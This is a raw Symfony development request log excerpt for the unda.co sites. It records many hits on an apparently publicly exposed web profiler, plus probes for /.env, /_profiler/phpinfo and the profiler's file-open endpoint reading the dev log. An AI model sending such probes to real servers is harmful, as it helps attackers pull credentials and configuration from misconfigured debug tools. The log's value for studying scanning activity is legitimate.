  2305. [2025-12-17 11:28:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
  2306. [2025-12-17 11:28:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
  2307. [2025-12-17 11:28:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
  2308. [2025-12-17 11:28:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2309. [2025-12-17 11:35:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3af495","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3af495?panel=twig","method":"GET"} []
  2310. [2025-12-17 11:35:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2311. [2025-12-17 11:36:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=db","method":"GET"} []
  2312. [2025-12-17 11:36:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2313. [2025-12-17 11:42:48] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2314. [2025-12-17 11:55:25] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0ae0c0","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0ae0c0/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2315. [2025-12-17 11:55:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2316. [2025-12-17 11:59:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c116bf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c116bf?panel=form","method":"GET"} []
  2317. [2025-12-17 11:59:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2318. [2025-12-17 12:19:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a70ed4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a70ed4","method":"GET"} []
  2319. [2025-12-17 12:19:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2320. [2025-12-17 12:19:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
  2321. [2025-12-17 12:19:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2322. [2025-12-17 12:19:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
  2323. [2025-12-17 12:19:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  2324. [2025-12-17 12:24:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
  2325. [2025-12-17 12:24:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
  2326. [2025-12-17 12:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ce7d?panel=logger","method":"GET"} []
  2327. [2025-12-17 12:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2328. [2025-12-17 12:30:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2329. [2025-12-17 12:37:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2330. [2025-12-17 12:37:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  2331. [2025-12-17 12:59:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
  2332. [2025-12-17 12:59:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2333. [2025-12-17 13:10:09] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []
  2334. [2025-12-17 13:13:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2335. [2025-12-17 13:16:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=exception","method":"GET"} []
  2336. [2025-12-17 13:16:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2337. [2025-12-17 13:26:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2338. [2025-12-17 13:30:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=cache","method":"GET"} []
  2339. [2025-12-17 13:30:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2340. [2025-12-17 13:31:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
  2341. [2025-12-17 13:31:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
  2342. [2025-12-17 13:32:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2g"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2g\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2343. [2025-12-17 13:32:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2h"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2h\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2344. [2025-12-17 13:32:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2345. [2025-12-17 13:32:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2346. [2025-12-17 13:32:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /teorema505"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /teorema505\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2347. [2025-12-17 13:48:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47","method":"GET"} []
  2348. [2025-12-17 13:48:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2349. [2025-12-17 13:53:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2350. [2025-12-17 13:59:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8f4430","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8f4430?panel=validator","method":"GET"} []
  2351. [2025-12-17 13:59:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  2352. [2025-12-17 13:59:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=twig","method":"GET"} []
  2353. [2025-12-17 13:59:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2354. [2025-12-17 14:11:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=time","method":"GET"} []
  2355. [2025-12-17 14:11:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2356. [2025-12-17 14:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=config","method":"GET"} []
  2357. [2025-12-17 14:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2358. [2025-12-17 14:30:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568","method":"GET"} []
  2359. [2025-12-17 14:30:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2360. [2025-12-17 14:32:13] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2361. [2025-12-17 14:32:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2362. [2025-12-17 14:39:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=security","method":"GET"} []
  2363. [2025-12-17 14:39:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2364. [2025-12-17 14:47:06] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2365. [2025-12-17 14:49:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=security","method":"GET"} []
  2366. [2025-12-17 14:49:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2367. [2025-12-17 14:49:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
  2368. [2025-12-17 14:49:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2369. [2025-12-17 14:49:36] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"9b10ec","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/9b10ec/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2370. [2025-12-17 14:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2371. [2025-12-17 14:49:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.45.61&limit=10&method=GET","method":"GET"} []
  2372. [2025-12-17 14:49:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.45.61&limit=10&method=GET","method":"GET"} []
  2373. [2025-12-17 14:50:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
  2374. [2025-12-17 14:50:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2375. [2025-12-17 14:55:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=cache","method":"GET"} []
  2376. [2025-12-17 14:55:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2377. [2025-12-17 14:56:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cdd835","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cdd835/search/results?limit=10&method=GET","method":"GET"} []
  2378. [2025-12-17 14:56:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  2379. [2025-12-17 14:56:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2380. [2025-12-17 14:58:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=request","method":"GET"} []
  2381. [2025-12-17 14:58:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2382. [2025-12-17 15:00:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c61e5e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c61e5e?panel=request","method":"GET"} []
  2383. [2025-12-17 15:00:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2384. [2025-12-17 15:02:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=router","method":"GET"} []
  2385. [2025-12-17 15:02:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  2386. [2025-12-17 15:03:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2387. [2025-12-17 15:05:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2388. [2025-12-17 15:05:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2389. [2025-12-17 15:05:56] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2390. [2025-12-17 15:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=config","method":"GET"} []
  2391. [2025-12-17 15:06:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2392. [2025-12-17 15:07:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  2393. [2025-12-17 15:14:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=security","method":"GET"} []
  2394. [2025-12-17 15:14:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2395. [2025-12-17 15:15:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=cache","method":"GET"} []
  2396. [2025-12-17 15:15:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2397. [2025-12-17 15:16:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
  2398. [2025-12-17 15:16:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
  2399. [2025-12-17 15:19:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2400. [2025-12-17 15:19:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2401. [2025-12-17 15:21:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
  2402. [2025-12-17 15:21:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2403. [2025-12-17 15:23:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=44.192.15.107&limit=10","method":"GET"} []
